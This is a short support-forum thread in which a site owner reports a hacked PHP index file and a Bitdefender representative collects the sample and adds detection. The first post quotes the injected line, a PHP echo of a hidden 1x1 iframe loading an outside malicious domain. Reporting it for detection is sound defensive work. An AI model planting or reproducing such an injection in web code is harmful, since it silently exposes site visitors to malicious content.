Jump to content


Photo

Index Injection Iframe Virus


  • Please log in to reply
9 replies to this topic

#1 Mickael du 93

Mickael du 93

    Newbie

  • Members
  • 4 posts

Posted 06 May 2012 - 12:40 PM

Hello,

My site was hacked, by this line added at top of the index file.

<?php echo "<iframe src=\"http://sluxxqqgykewolmoli.in/in.cgi?default\" width=1 height=1 frameborder=0></iframe>"; echo "";

And Bitdefender don't detect this !
thank you to add this one
all my pass was changed



#2 Christian

Christian

    Bitdefender Support

  • Root Admin
  • PipPipPipPipPipPip
  • 14,021 posts
  • Gender:Male
  • Location:BitDefender HQ
  • Interests:Private

Posted 06 May 2012 - 12:45 PM

Hello smile.gif

Welcome to the forums!

Bitdefender detects that website as infected.

https://www.virustot...sis/1336300527/

Let me know if you have other questions.

Take care.

#3 Mickael du 93

Mickael du 93

    Newbie

  • Members
  • 4 posts

Posted 06 May 2012 - 12:48 PM

Oh yes, it was te only one on the list that detect it.

I tought it not detect it because when I scan my index file, it said no virus, but with other url injection I got on another website, it said virus and delete the virus from the file automatically.

Why the index file not detected as virus so like other url injections ?

thank you

#4 Christian

Christian

    Bitdefender Support

  • Root Admin
  • PipPipPipPipPipPip
  • 14,021 posts
  • Gender:Male
  • Location:BitDefender HQ
  • Interests:Private

Posted 06 May 2012 - 02:59 PM

Hello smile.gif

Could you please send me the infected index file so we can check it out?

Please pack that file in archive with the password infected and upload it on

http://www.sendspace.com

or

http://www.mediafire.com

and send me a PM with the download link.

We will analyze the information you sent and then reply with a possible solution in the shortest time.

Have a nice day.

#5 Mickael du 93

Mickael du 93

    Newbie

  • Members
  • 4 posts

Posted 06 May 2012 - 03:15 PM

QUOTE (Christian @ May 6 2012, 02:59 PM) <{POST_SNAPBACK}>
Could you please send me the infected index file so we can check it out?



PM sent with zip link
ty !

#6 Christian

Christian

    Bitdefender Support

  • Root Admin
  • PipPipPipPipPipPip
  • 14,021 posts
  • Gender:Male
  • Location:BitDefender HQ
  • Interests:Private

Posted 06 May 2012 - 04:29 PM

Hello smile.gif

I have sent the file to our labs, I will get back to you with a final answer.

Take care.

#7 Fa1c0n

Fa1c0n

    Newbie

  • Members
  • 1 posts

Posted 07 May 2012 - 02:43 AM

I am interested to hear about this too as i found this code on one of our websites too and have been googling for information.

Please pop an update on this thread when you have one.

#8 Christian

Christian

    Bitdefender Support

  • Root Admin
  • PipPipPipPipPipPip
  • 14,021 posts
  • Gender:Male
  • Location:BitDefender HQ
  • Interests:Private

Posted 07 May 2012 - 09:24 AM

Hello smile.gif

The file has been signed as Trojan.Iframe.APT Detection will be available after our next update.

File index_php declared INFECTED

Thank you for the sample.

#9 Mickael du 93

Mickael du 93

    Newbie

  • Members
  • 4 posts

Posted 07 May 2012 - 09:57 AM

Hi Christian,

Great job, now I feel better on my FTP updates :-)

Thank you !!



#10 Christian

Christian

    Bitdefender Support

  • Root Admin
  • PipPipPipPipPipPip
  • 14,021 posts
  • Gender:Male
  • Location:BitDefender HQ
  • Interests:Private

Posted 07 May 2012 - 11:26 AM

Hi smile.gif

Thank you for your feedback!

Let us know if you need anything from us.

Take care.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users